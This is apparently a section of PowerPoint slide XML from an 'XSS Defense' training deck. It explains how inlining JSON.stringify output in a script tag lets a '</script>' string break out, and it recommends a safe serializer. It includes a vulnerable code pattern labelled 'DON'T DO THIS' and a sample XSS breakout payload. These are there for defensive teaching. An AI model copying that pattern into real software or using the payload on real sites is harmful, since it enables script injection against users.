            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("GET", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://example.com/item.json"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>=function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> === 4){  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> === 200){ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> response = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xhr.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> response = "Error Occurred";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>oReq.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197671790"/>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908"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pre-Fetching Data to Render in JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1411898"/>
            <a:ext cx="8686800" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>DON'T DO THIS! It could lead to XSS!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139148" y="2040677"/>
            <a:ext cx="9004852" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.__INITIAL_STATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3440554"/>
            <a:ext cx="7971183" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> object contains any string with &lt;/script&gt; in it, that will escape out of your script tag and start appending everything after it as HTML code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139148" y="5535325"/>
            <a:ext cx="9004852" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;{{&lt;/script&gt;&lt;script&gt;alert(‘XSS’)}}&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74948140"/>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908"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pre-Fetching Data Safely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1411898"/>
            <a:ext cx="8686800" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Running an XSS sanitizer over your JSON object will most likely mutilate it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>Serialize embedded JSON with a safe serialization engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Node: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/yahoo/serialize-javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4842737"/>
            <a:ext cx="8229600" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.__INITIAL_STATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = &lt;%= serialize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) %&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1204833596"/>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786"/>
            <a:ext cx="9144000" cy="556588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/yahoo/serialize-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1042088"/>
            <a:ext cx="8229600" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Will serialize code to a string of literal JavaScript which can be embedded in an HTML document by adding it as the contents of the &lt;script&gt; element. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>In order to make this safe, HTML characters and JavaScript line terminators are escaped automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serialize({ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>haxorXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: '&lt;/script&gt;' });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>The above will produce the following string, HTML-escaped output which is safe to put into an HTML document as it will not cause the inline script element to terminate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>haxorXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>":"\\u003C\\u002Fscript\\u003E"}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1875271523"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Custom 2">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1D9EBA"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FDC725"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DB3D16"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="9E9187"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FB921F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9A9F1A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A21079"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0E4C4E"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="DB3D16"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="9E918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accent2"/>
          </a:solidFill>
          <a:tailEnd type="triangle" w="lg" len="lg"/>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24762</TotalTime>
  <Words>6490</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1442</Paragraphs>
  <Slides>115</Slides>
  <Notes>78</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115</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="126" baseType="lpstr">
      <vt:lpstr>ヒラギノ角ゴ ProN W3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Webdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>XSS Defense</vt:lpstr>
